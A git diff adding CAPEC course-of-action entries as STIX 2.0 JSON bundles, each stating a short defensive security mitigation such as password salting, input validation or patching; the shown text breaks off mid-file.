b/capec/course-of-action/course-of-action--d4db5596-3b70-4957-9170-a832e2cd0356.json new file mode 100644 index 0000000000..fda70bb93b --- /dev/null +++ b/capec/course-of-action/course-of-action--d4db5596-3b70-4957-9170-a832e2cd0356.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--a8e07fc1-908d-4ffb-8f5a-dd5b5c33bb5f", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--d4db5596-3b70-4957-9170-a832e2cd0356", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-112-0", + "description": "Select a provably large secret space for selection of the secret. Provably large means that the procedure by which the secret is selected does not have artifacts that significantly reduce the size of the total secret space.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--d4dcaaf9-90cf-4710-8e21-3826cee87167.json b/capec/course-of-action/course-of-action--d4dcaaf9-90cf-4710-8e21-3826cee87167.json new file mode 100644 index 0000000000..d4f244fd70 --- /dev/null +++ b/capec/course-of-action/course-of-action--d4dcaaf9-90cf-4710-8e21-3826cee87167.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--40912847-4b92-47c7-821e-fde73356882e", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--d4dcaaf9-90cf-4710-8e21-3826cee87167", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-01-12T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-589-0", + "description": "\n Hard Coded Alternate DNS server in applications\n Avoid dependence on DNS\n Include \"hosts file\"/IP address in the application\n Ensure best practices with respect to communications channel protections.\n Use a .onion domain with Tor support\n ", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--d4ef596f-7bd1-4d5c-9603-210276b30b41.json b/capec/course-of-action/course-of-action--d4ef596f-7bd1-4d5c-9603-210276b30b41.json new file mode 100644 index 0000000000..dd13763c32 --- /dev/null +++ b/capec/course-of-action/course-of-action--d4ef596f-7bd1-4d5c-9603-210276b30b41.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--4a092689-a70e-44d7-9941-01c71bb2894d", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--d4ef596f-7bd1-4d5c-9603-210276b30b41", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-89-1", + "description": "Known vulnerabilities in DNS or router software or in operating systems must be patched as soon as a fix has been released and tested.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--d57aef14-fcf9-41f7-a9a3-e071e4282415.json b/capec/course-of-action/course-of-action--d57aef14-fcf9-41f7-a9a3-e071e4282415.json new file mode 100644 index 0000000000..579a89e821 --- /dev/null +++ b/capec/course-of-action/course-of-action--d57aef14-fcf9-41f7-a9a3-e071e4282415.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--33729228-6daa-4a91-89fb-588548e537b4", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--d57aef14-fcf9-41f7-a9a3-e071e4282415", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-417-0", + "description": "An organization should provide regular, robust cybersecurity training to its employees to prevent social engineering attacks.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--d5c9990e-fec4-4e5e-a4bd-07a832e34a43.json b/capec/course-of-action/course-of-action--d5c9990e-fec4-4e5e-a4bd-07a832e34a43.json new file mode 100644 index 0000000000..5e5d299559 --- /dev/null +++ b/capec/course-of-action/course-of-action--d5c9990e-fec4-4e5e-a4bd-07a832e34a43.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--4f38bb55-804d-420d-8988-e58274ae7037", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--d5c9990e-fec4-4e5e-a4bd-07a832e34a43", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-611-0", + "description": "Authenticate all servers and perform redundant checks when using DNS hostnames.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--d6e6bdf1-4cf0-47dd-bc63-891dfd4e3d9e.json b/capec/course-of-action/course-of-action--d6e6bdf1-4cf0-47dd-bc63-891dfd4e3d9e.json new file mode 100644 index 0000000000..2b58a8d575 --- /dev/null +++ b/capec/course-of-action/course-of-action--d6e6bdf1-4cf0-47dd-bc63-891dfd4e3d9e.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--b23e4218-394f-41d6-9564-0490880b3b36", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--d6e6bdf1-4cf0-47dd-bc63-891dfd4e3d9e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-219-1", + "description": "Implementation: Use SSL for connections between all parties with mutual authentication.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--d87a2576-bfa8-4ce3-8928-fd1b1e3b6a64.json b/capec/course-of-action/course-of-action--d87a2576-bfa8-4ce3-8928-fd1b1e3b6a64.json new file mode 100644 index 0000000000..5b7763a8c4 --- /dev/null +++ b/capec/course-of-action/course-of-action--d87a2576-bfa8-4ce3-8928-fd1b1e3b6a64.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--47ed18db-8b98-43b1-a84f-8824c5b94db1", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--d87a2576-bfa8-4ce3-8928-fd1b1e3b6a64", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-52-0", + "description": "Properly handle the NULL characters supplied as part of user input prior to doing anything with the data.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--da64dfaa-01b4-4658-9671-e5ba690138d4.json b/capec/course-of-action/course-of-action--da64dfaa-01b4-4658-9671-e5ba690138d4.json new file mode 100644 index 0000000000..acc4b525bd --- /dev/null +++ b/capec/course-of-action/course-of-action--da64dfaa-01b4-4658-9671-e5ba690138d4.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--6f317f7a-295b-405e-ab54-2a1c5f3131c6", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--da64dfaa-01b4-4658-9671-e5ba690138d4", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-11-09T00:00:00.000Z", + "name": "coa-21-3", + "description": "Implementation: If the web or application server supports it, then encrypting and/or signing the session ID (such as cookie) can protect the ID if intercepted.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--da850044-15b8-4e5e-8e40-08eba6b4fdee.json b/capec/course-of-action/course-of-action--da850044-15b8-4e5e-8e40-08eba6b4fdee.json new file mode 100644 index 0000000000..027d0a0e24 --- /dev/null +++ b/capec/course-of-action/course-of-action--da850044-15b8-4e5e-8e40-08eba6b4fdee.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--58ea3373-4bb4-4cab-9696-1a1440d9d491", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--da850044-15b8-4e5e-8e40-08eba6b4fdee", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-644-2", + "description": "Leverage system penetration testing and other defense in depth methods to determine vulnerable systems within a domain.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--daa82e33-b38f-4b0d-8a94-c85e8b3d57ef.json b/capec/course-of-action/course-of-action--daa82e33-b38f-4b0d-8a94-c85e8b3d57ef.json new file mode 100644 index 0000000000..c8ef14896c --- /dev/null +++ b/capec/course-of-action/course-of-action--daa82e33-b38f-4b0d-8a94-c85e8b3d57ef.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--93c91a08-3a78-40af-9102-13850874f4d7", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--daa82e33-b38f-4b0d-8a94-c85e8b3d57ef", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-55-0", + "description": "Use salt when computing password hashes. That is, concatenate the salt (random bits) with the original password prior to hashing it.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--dac433fc-a4e6-4cb0-b8ec-2f6d2f1adf3b.json b/capec/course-of-action/course-of-action--dac433fc-a4e6-4cb0-b8ec-2f6d2f1adf3b.json new file mode 100644 index 0000000000..c23626feb1 --- /dev/null +++ b/capec/course-of-action/course-of-action--dac433fc-a4e6-4cb0-b8ec-2f6d2f1adf3b.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--5e1d08c0-3133-402a-9a56-2ae7ba82837b", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--dac433fc-a4e6-4cb0-b8ec-2f6d2f1adf3b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "name": "coa-126-7", + "description": "Implementation: Perform input validation for all remote content, including remote and user-generated content.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--db632a96-33ad-46ce-b5f3-efba6a2e6495.json b/capec/course-of-action/course-of-action--db632a96-33ad-46ce-b5f3-efba6a2e6495.json new file mode 100644 index 0000000000..cfe722465a --- /dev/null +++ b/capec/course-of-action/course-of-action--db632a96-33ad-46ce-b5f3-efba6a2e6495.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--e72b5d8e-fbdc-46a6-a9e5-8d15e398026b", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--db632a96-33ad-46ce-b5f3-efba6a2e6495", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-168-1", + "description": "Implementation: Use Vista dir with the -R switch or utility to find Alternate Data Streams and take appropriate action with those discovered.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--dbc2eaec-3912-4414-a6ca-c88c494ad97c.json b/capec/course-of-action/course-of-action--dbc2eaec-3912-4414-a6ca-c88c494ad97c.json new file mode 100644 index 0000000000..b4d7df4923 --- /dev/null +++ b/capec/course-of-action/course-of-action--dbc2eaec-3912-4414-a6ca-c88c494ad97c.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--6d3cf43a-3972-4e39-8fcd-a833e088b4d0", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--dbc2eaec-3912-4414-a6ca-c88c494ad97c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "coa-81-0", + "description": "Design: Use input validation before writing to web log", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--dbf98824-2003-44af-87f6-70a7b758c158.json b/capec/course-of-action/course-of-action--dbf98824-2003-44af-87f6-70a7b758c158.json new file mode 100644 index 0000000000..c217a4368e --- /dev/null +++ b/capec/course-of-action/course-of-action--dbf98824-2003-44af-87f6-70a7b758c158.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--564855f3-a516-4e5d-b308-78f397a430c1", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--dbf98824-2003-44af-87f6-70a7b758c158", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-92-3", + "description": "Always do bound checking before consuming user input data.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--dbf9a25e-d615-4e5d-98c7-6332cae5810a.json b/capec/course-of-action/course-of-action--dbf9a25e-d615-4e5d-98c7-6332cae5810a.json new file mode 100644 index 0000000000..a22173724a --- /dev/null +++ b/capec/course-of-action/course-of-action--dbf9a25e-d615-4e5d-98c7-6332cae5810a.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--07f1aa7d-8284-4670-8b56-17452b6a5a98", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--dbf9a25e-d615-4e5d-98c7-6332cae5810a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-193-3", + "description": "Configuration: Ensure that remote scripts cannot be include in the \"include\" or \"require\" PHP directives", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--dc06e25a-ebf3-4958-a253-78d3abc83b7a.json b/capec/course-of-action/course-of-action--dc06e25a-ebf3-4958-a253-78d3abc83b7a.json new file mode 100644 index 0000000000..0aa8993693 --- /dev/null +++ b/capec/course-of-action/course-of-action--dc06e25a-ebf3-4958-a253-78d3abc83b7a.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--bb1e748b-029b-4fb5-b26c-094eba8ce4d9", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--dc06e25a-ebf3-4958-a253-78d3abc83b7a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-562-0", + "description": "Disallow shared content. Protect shared folders by minimizing users that have write access. Use utilities that mitigate exploitation like the Microsoft Enhanced Mitigation Experience Toolkit (EMET) to prevent exploits from being run.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--dc1128bf-f2b2-46b5-90f6-fffd43578221.json b/capec/course-of-action/course-of-action--dc1128bf-f2b2-46b5-90f6-fffd43578221.json new file mode 100644 index 0000000000..6492cdb344 --- /dev/null +++ b/capec/course-of-action/course-of-action--dc1128bf-f2b2-46b5-90f6-fffd43578221.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--92d172ca-127d-473f-bd5f-a46eba24cd90", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--dc1128bf-f2b2-46b5-90f6-fffd43578221", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-93-0", + "description": "Carefully control access to physical log files.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--dc1ceef0-501c-43b4-971b-0ba43a8c610d.json b/capec/course-of-action/course-of-action--dc1ceef0-501c-43b4-971b-0ba43a8c610d.json new file mode 100644 index 0000000000..2966b62ba1 --- /dev/null +++ b/capec/course-of-action/course-of-action--dc1ceef0-501c-43b4-971b-0ba43a8c610d.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--d4ddbca1-50da-47fa-a0cf-8c72d6d496e3", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--dc1ceef0-501c-43b4-971b-0ba43a8c610d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-109-1", + "description": "Ensure to keep up to date with security relevant updates to the persistence framework used within your application.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--dcaef8bd-0231-4f2b-ae58-17cfacfcb6d5.json b/capec/course-of-action/course-of-action--dcaef8bd-0231-4f2b-ae58-17cfacfcb6d5.json new file mode 100644 index 0000000000..cfcb641198 --- /dev/null +++ b/capec/course-of-action/course-of-action--dcaef8bd-0231-4f2b-ae58-17cfacfcb6d5.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--ee9fadfc-ab7e-462b-947e-77dc063e91de", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--dcaef8bd-0231-4f2b-ae58-17cfacfcb6d5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-04-15T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-593-0", + "description": "Properly encrypt and sign identity tokens in transit, and use industry standard session key generation mechanisms that utilize high amount of entropy to generate the session key. Many standard web and application servers will perform this task on your behalf. Utilize a session timeout for all sessions. If the user does not explicitly logout, terminate their session after this period of inactivity. If the user logs back in then a new session key should be generated.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--dcd3ef50-9ba5-43c7-883f-9dd4c521fbb0.json b/capec/course-of-action/course-of-action--dcd3ef50-9ba5-43c7-883f-9dd4c521fbb0.json new file mode 100644 index 0000000000..65caf0531a --- /dev/null +++ b/capec/course-of-action/course-of-action--dcd3ef50-9ba5-43c7-883f-9dd4c521fbb0.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--9ae67fbd-ffe9-4abe-a30c-804b947888a1", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--dcd3ef50-9ba5-43c7-883f-9dd4c521fbb0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-237-0", + "description": "Assurance: Sanitize the code of the standard libraries to make sure there is no security weaknesses in them.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--dd4d3483-f79a-4e5b-b198-743b20bf8b57.json b/capec/course-of-action/course-of-action--dd4d3483-f79a-4e5b-b198-743b20bf8b57.json new file mode 100644 index 0000000000..424d75f0a3 --- /dev/null +++ b/capec/course-of-action/course-of-action--dd4d3483-f79a-4e5b-b198-743b20bf8b57.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--6a69f38f-7650-4466-ab6e-3b3cc3c6e232", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--dd4d3483-f79a-4e5b-b198-743b20bf8b57", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-90-1", + "description": "The use of HMAC to hash the response from the server can also be used to thwart reflection. The server responds by returning its own challenge as well as hashing the client's challenge, its own challenge and the pre-shared secret. Requiring the client to respond with the HMAC of the two challenges ensures that only the possessor of a valid pre-shared secret can successfully hash in the two values.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--ddb89ff3-8582-425b-b2ff-fb3972d9861e.json b/capec/course-of-action/course-of-action--ddb89ff3-8582-425b-b2ff-fb3972d9861e.json new file mode 100644 index 0000000000..42c80241a1 --- /dev/null +++ b/capec/course-of-action/course-of-action--ddb89ff3-8582-425b-b2ff-fb3972d9861e.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--80554b02-6d18-47f0-a778-4a4ece0f6158", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--ddb89ff3-8582-425b-b2ff-fb3972d9861e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-16-0", + "description": "Create a strong password policy and ensure that your system enforces this policy.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--de1dd950-a57f-41b0-8ba9-0ca088dc0128.json b/capec/course-of-action/course-of-action--de1dd950-a57f-41b0-8ba9-0ca088dc0128.json new file mode 100644 index 0000000000..54331edee6 --- /dev/null +++ b/capec/course-of-action/course-of-action--de1dd950-a57f-41b0-8ba9-0ca088dc0128.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--e0d548be-ef74-41ac-82f4-b8786f9bccd9", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--de1dd950-a57f-41b0-8ba9-0ca088dc0128", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-75-4", + "description": "Implementation: Load configuration from separate process and memory space, for example a separate physical device like a CD", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--de575342-7f82-440a-8860-a403ad7a0590.json b/capec/course-of-action/course-of-action--de575342-7f82-440a-8860-a403ad7a0590.json new file mode 100644 index 0000000000..903c93a01a --- /dev/null +++ b/capec/course-of-action/course-of-action--de575342-7f82-440a-8860-a403ad7a0590.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--1cd4dc04-efe7-4527-b5b6-766e17b75978", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--de575342-7f82-440a-8860-a403ad7a0590", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-577-0", + "description": "Ensure that proper permissions on files and folders are enacted to limit accessibility.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--de6705ec-bc11-4a96-adfa-da407741e58a.json b/capec/course-of-action/course-of-action--de6705ec-bc11-4a96-adfa-da407741e58a.json new file mode 100644 index 0000000000..9ef1620745 --- /dev/null +++ b/capec/course-of-action/course-of-action--de6705ec-bc11-4a96-adfa-da407741e58a.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--f3ed3183-d954-4653-925d-49c84514f1b2", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--de6705ec-bc11-4a96-adfa-da407741e58a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-12-07T00:00:00.000Z", + "name": "coa-44-4", + "description": "Implementation: Keep software patched to ensure that known vulnerabilities are not available for attackers to target on host.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--de9c19cf-2b80-4083-9bee-dd349ac4608d.json b/capec/course-of-action/course-of-action--de9c19cf-2b80-4083-9bee-dd349ac4608d.json new file mode 100644 index 0000000000..8ce47d24bf --- /dev/null +++ b/capec/course-of-action/course-of-action--de9c19cf-2b80-4083-9bee-dd349ac4608d.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--8f2c2743-c986-4ae2-899a-be57d6b4f55c", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--de9c19cf-2b80-4083-9bee-dd349ac4608d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-159-2", + "description": "Implementation: Use obfuscation and other techniques to prevent reverse engineering the libraries.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--dea16962-39f8-45fc-a56d-358a8713bdf9.json b/capec/course-of-action/course-of-action--dea16962-39f8-45fc-a56d-358a8713bdf9.json new file mode 100644 index 0000000000..3088f13f26 --- /dev/null +++ b/capec/course-of-action/course-of-action--dea16962-39f8-45fc-a56d-358a8713bdf9.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--02e26b4b-d485-4e7f-ae56-067257b768a6", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--dea16962-39f8-45fc-a56d-358a8713bdf9", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-637-0", + "description": "While copying and pasting of data with the clipboard is a legitimate and practical function, certain situations and context may require the disabling of this feature. Just as certain applications disable screenshot capability, applications that handle highly sensitive information should consider disabling copy and paste functionality.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--df2e871a-78b5-4ba1-83d2-30886d304580.json b/capec/course-of-action/course-of-action--df2e871a-78b5-4ba1-83d2-30886d304580.json new file mode 100644 index 0000000000..30b86a1f02 --- /dev/null +++ b/capec/course-of-action/course-of-action--df2e871a-78b5-4ba1-83d2-30886d304580.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--9a54ed29-3176-4045-b9cf-263df8d1e7f9", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--df2e871a-78b5-4ba1-83d2-30886d304580", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-05-31T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-642-0", + "description": "Insure that binaries commonly used by the system have the correct file permissions. Set operating system policies that restrict privilege elevation of non-Administrators. Use auditing tools to observe changes to system services.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--dfb8c9ec-2f27-4bdd-a86b-e89823d238d8.json b/capec/course-of-action/course-of-action--dfb8c9ec-2f27-4bdd-a86b-e89823d238d8.json new file mode 100644 index 0000000000..abc270afcd --- /dev/null +++ b/capec/course-of-action/course-of-action--dfb8c9ec-2f27-4bdd-a86b-e89823d238d8.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--9629cf63-3ddf-4134-86c3-c7ebc8fd5c59", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--dfb8c9ec-2f27-4bdd-a86b-e89823d238d8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-617-0", + "description": "Passively monitor cellular network connection for real-time threat detection and logging for manual review.", + "object_marking_refs": [ + 